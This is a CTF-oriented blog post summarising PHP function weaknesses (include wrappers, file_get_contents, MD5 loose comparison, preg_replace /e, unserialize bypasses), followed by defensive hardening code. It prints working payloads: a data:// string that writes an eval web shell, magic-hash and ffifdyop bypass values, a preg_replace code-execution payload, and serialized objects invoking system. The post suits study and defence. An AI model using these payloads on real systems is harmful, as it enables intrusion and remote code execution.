Summary of PHP function vulnerabilities
2022-08-02 04:02:00 【SevenCold】
During CTF code audits I keep running into function-level vulnerabilities of all kinds, but my notes on them are scattered, so I am collecting them here. This post will be updated continuously~
1. include
Most CTF players are already familiar with this one: the file inclusion vulnerability. The related functions require, include_once and require_once behave the same way. The classic pairing is with PHP pseudo-protocols (stream wrappers).
Common scenarios include:
(1) Reading a file's source: php://filter/read=convert.base64-encode/resource=xxx.php
What comes back is base64-encoded; just decode it.
(2) Running PHP code: data://text/plain,<?php print_r(glob("*")); ?> or data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval($_POST['h']);?>")?>
2. file_get_contents
This function reads a file's contents into a string, but combined with PHP pseudo-protocols it allows a rather strange trick that comes up often in CTF problems: producing whatever echo you want.
That is, the return value of file_get_contents('data:text/plain,xxxxxxx') is xxxxxxx.
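The defensive side of the two wrapper tricks above, as an added example (not code from the original post): a loader for user-selected files that refuses any stream wrapper scheme, restricts the name to a safe character set, and confirms the resolved path stays inside one directory before calling file_get_contents (the same checks apply before include). PAGES_DIR, load_page and the sample inputs are assumptions, and the code targets PHP 8 for str_contains and str_starts_with.

```php
<?php
// Added example, not from the original post. Loads a user-selected page file
// without letting php://, data:, phar:// or path traversal through.
// PAGES_DIR, load_page() and the sample inputs are assumptions. Needs PHP 8.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';   // assumed directory of allowed files

function load_page(string $name): string
{
    // Every stream wrapper is written as "scheme:" (php:, data:, phar:, ...),
    // so a colon or a NUL byte is never legitimate in a plain page name.
    if (str_contains($name, ':') || str_contains($name, "\0")) {
        throw new InvalidArgumentException('wrapper schemes are not allowed');
    }

    // Conservative whitelist: no slashes, dots or spaces, so "../" cannot appear.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $name)) {
        throw new InvalidArgumentException('invalid page name');
    }

    // Resolve symlinks and "." components, then confirm the result is still
    // inside PAGES_DIR before touching it.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $name . '.php');
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException('page not found');
    }

    // Only the verified path reaches file_get_contents (or include).
    $data = file_get_contents($path);
    if ($data === false) {
        throw new RuntimeException('read failed');
    }
    return $data;
}

// Constructed inputs: one benign name and three of the wrapper/traversal shapes
// discussed above. With no pages/ directory present, "index" is also refused,
// which is the intended fail-closed behaviour.
$inputs = [
    'index',
    'php://filter/read=convert.base64-encode/resource=index.php',
    'data:text/plain,hello',
    '../../etc/passwd',
];
foreach ($inputs as $input) {
    try {
        load_page($input);
        echo "$input => allowed\n";
    } catch (Throwable $e) {
        echo "$input => rejected ({$e->getMessage()})\n";
    }
}
```

Note that allow_url_include=Off blocks data:// inside include, but php://filter is a local wrapper and is not affected by that setting, so the check in code is still needed.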
3. MD5 comparison
PHP has two equality operators: loose equality == and strict equality ===.
(1) == bypass. == does not compare types: it first converts the two operands to the same type and then compares them, so this can be engineered. For example, make both sides start with 0e; such a string is treated as scientific notation for 0, so they compare equal.
Values whose MD5 starts with 0e, with their hashes:
QNKCDZO: 0e830400451993494058024219903391
240610708: 0e462097431906509019562988736854
s878926199a: 0e545993274517709034328855841020
s155964671a: 0e342768416822451524974117254469
s214587387a: 0e848240448830537924465865611904
Arrays can also be used for a bypass, because md5 of an array returns false.
md5('0e215962017') == '0e215962017'
If there is no md5 hashing and only ==, you can construct the string directly; for example '123admin'==123 is true.
(2) === bypass
This can be bypassed with the array trick above, or of course with an MD5 collision.
(3) MD5 in SQL injection
After MD5 hashing, ffifdyop works as a universal password: when the digest is used in raw binary form it begins with the bytes 'or'6 followed by other bytes.
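The comparisons discussed in this section, as an added example (not code from the original post): it shows the loose-comparison failure on two of the magic hashes above, the raw ffifdyop digest, and a hardened check based on a type test plus hash_equals (and password_verify for real passwords). The helper names are assumptions; the comments on PHP 7 versus PHP 8 behaviour reflect the documented change to string/number comparison in PHP 8.

```php
<?php
// Added example, not from the original post. Shows why == fails on "0e" digests
// and how to compare digests safely. The helper names are assumptions.
declare(strict_types=1);

// Two magic strings from the table above: both digests are "0e" followed only
// by digits, so == parses them as the float 0.0 and they become equal.
$a = md5('QNKCDZO');    // 0e830400451993494058024219903391
$b = md5('240610708');  // 0e462097431906509019562988736854
var_dump($a == $b);     // bool(true)   loose: both read as 0.0
var_dump($a === $b);    // bool(false)  strict: different strings

// The same root cause with plain strings. PHP 7: '123admin' == 123 is true
// (the leading digits are used). PHP 8 changed this: a non-numeric string is
// compared as a string, so 123 == '123admin' is false there.
var_dump('123' == 123); // bool(true) on every version: '123' is numeric

// ffifdyop: the raw (binary) digest starts with the bytes ' o r ' 6, which,
// concatenated into SQL, yields ... pw='' or '6...'. Hex output does not.
echo bin2hex(substr(md5('ffifdyop', true), 0, 5)), "\n";   // 276f722736

// Vulnerable pattern: loose comparison against a stored digest. On PHP 7
// md5(array) is NULL plus a warning; on PHP 8 it throws a TypeError.
function check_digest_weak($supplied, string $expected): bool
{
    return md5($supplied) == $expected;
}

// Hardened pattern: reject non-strings, then compare strictly and in
// constant time. hash_equals() never applies numeric coercion.
function check_digest_safe(mixed $supplied, string $expected): bool
{
    if (!is_string($supplied)) {
        return false;
    }
    return hash_equals($expected, md5($supplied));
}

// For passwords, do not use MD5 at all.
function check_password(mixed $supplied, string $stored_hash): bool
{
    return is_string($supplied) && password_verify($supplied, $stored_hash);
}

$stored = md5('240610708');                          // 0e46...
var_dump(check_digest_weak('QNKCDZO', $stored));     // bool(true)  bypassed
var_dump(check_digest_safe('QNKCDZO', $stored));     // bool(false)
var_dump(check_digest_safe('240610708', $stored));   // bool(true)
var_dump(check_digest_safe(['x'], $stored));         // bool(false)

$hash = password_hash('correct horse', PASSWORD_DEFAULT);
var_dump(check_password('correct horse', $hash));    // bool(true)
var_dump(check_password(['x'], $hash));              // bool(false)
```

For the SQL case the fix is independent of the hash: bind the digest as a query parameter instead of concatenating it, and use the hex form rather than raw bytes; the ffifdyop trick needs both raw output and string concatenation to work.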
4. preg_replace
This is the regex replacement function. When the regular expression carries the e modifier there is a code execution vulnerability that lets us run PHP functions: if the second parameter of this function is controllable, arbitrary code can be executed.
Here is a related challenge. I have skipped the earlier steps and go straight to the source of an intermediate file.
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
    // The e modifier makes preg_replace eval() the replacement string
    // after substituting the submatch \1 into it.
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
function getFlag(){
    @eval($_GET['cmd']);
}
It is obvious from the code that we need to run the getFlag function and then pass the command through the cmd parameter. How do we run getFlag? Through preg_replace. But in the code the second parameter of preg_replace is fixed. Looking at the documentation, strtolower("\1") is just \1, and \1 refers to the first submatch, so we can construct the payload \S*=${phpinfo()} to execute a function, i.e. \S*=${getFlag()}, while also passing the cmd parameter to execute the command.
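The same helper without the e modifier, as an added example (not the challenge's own code): preg_replace_callback applies a real PHP callable to each match, so the replacement is never evaluated as code, and the caller-supplied text is escaped with preg_quote so it cannot alter the pattern. The e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this version also runs on current PHP. complex_safe, the literal-match behaviour and the sample inputs are assumptions; preg_last_error_msg needs PHP 8.

```php
<?php
// Added example, not from the original post. The challenge's complex()
// rewritten without the e modifier. complex_safe() and the inputs are assumed.
declare(strict_types=1);

function complex_safe(string $re, string $str): string
{
    // Delimiters and modifiers come from the code, never from the caller,
    // and the caller's text is quoted so it is matched literally. Whether a
    // literal match is what the feature needs is an assumption here.
    $pattern = '/(' . preg_quote($re, '/') . ')/i';

    // The callback is a real closure: nothing in $str or $re is evaluated.
    $result = preg_replace_callback(
        $pattern,
        static fn(array $m): string => strtolower($m[1]),
        $str
    );

    if ($result === null) {
        throw new RuntimeException('regex error: ' . preg_last_error_msg());
    }
    return $result;
}

// Constructed inputs: a normal use, then the payload shape from the write-up,
// which is now just text to be matched and comes back unchanged.
echo complex_safe('Flag', 'Get The FLAG Now'), "\n";   // Get The flag Now
echo complex_safe('\S*', '${getFlag()}'), "\n";        // ${getFlag()}
```

If the feature genuinely needs caller-chosen regular expressions, keep a fixed list of permitted patterns in code and look the caller's choice up in it rather than quoting; the point that does not change is that the replacement side must be a callable.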
5. unserialize
This is the deserialization function, also common in CTF problems, and it has a lot of odd bugs.
(1) Bypassing the __wakeup function
__wakeup is defined in the class and is called automatically when unserialize runs. Of course it can be bypassed: if the serialized string is O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
just make the number after Test larger than the actual 2 to bypass __wakeup.
(2) Bypassing preg_match
if (preg_match('/o:\d+:/i', $file)) {
    die("hacking!!!");
}
If the serialized string is O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
just add a "+" sign in front of the 4 after O to bypass preg_match.
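Why the regex gate above is the wrong kind of defence and what to do instead, as an added example (not code from the original post): it shows the write-up's filter missing the signed length, a slightly stronger denylist that catches it, and the actual fix, which is refusing to instantiate application classes from untrusted input with the allowed_classes option of unserialize (PHP 7.0+). The class name Test and the serialized string come from the write-up; the class body, the helper names and the outputs shown are assumptions.

```php
<?php
// Added example, not from the original post. Test is the class name from the
// write-up; its body and the helper names are constructed for illustration.
declare(strict_types=1);

class Test
{
    public string $p = '';
    public string $func = '';

    public function __wakeup(): void
    {
        // Defensive reset: a callable name must never arrive via unserialize.
        $this->func = '';
    }
}

// The gate from the write-up: matches "O:<digits>:" only.
function weak_filter(string $s): bool
{
    return (bool) preg_match('/o:\d+:/i', $s);
}

// Also catches the "+" length prefix and C: (custom-serialized) objects.
// Still a denylist of serialization syntax, so only a stop-gap.
function stronger_filter(string $s): bool
{
    return (bool) preg_match('/[oc]:\+?\d+:/i', $s);
}

// The real fix: never let unserialize() build application objects from
// untrusted data. With allowed_classes => false every object becomes
// __PHP_Incomplete_Class, so no __wakeup/__destruct of Test ever runs.
function safe_unserialize(string $s): mixed
{
    return unserialize($s, ['allowed_classes' => false]);
}

$payload = 'O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}';
$signed  = 'O:+4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}';

var_dump(weak_filter($payload), weak_filter($signed));         // true, false
var_dump(stronger_filter($payload), stronger_filter($signed)); // true, true

// Default unserialize(): Test is instantiated and __wakeup runs.
$obj = unserialize($payload);
var_dump($obj instanceof Test, $obj->func);                    // true, ""

// Hardened: no Test object exists at all, so neither magic method matters.
$safe = safe_unserialize($payload);
var_dump($safe instanceof __PHP_Incomplete_Class);             // true
var_dump($safe instanceof Test);                               // false
```

Where the data does not need objects at all, a format with no object semantics (json_decode) removes the whole class of bugs; where specific classes are required, pass their names in allowed_classes instead of false and still validate every property in __wakeup.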
... to be continued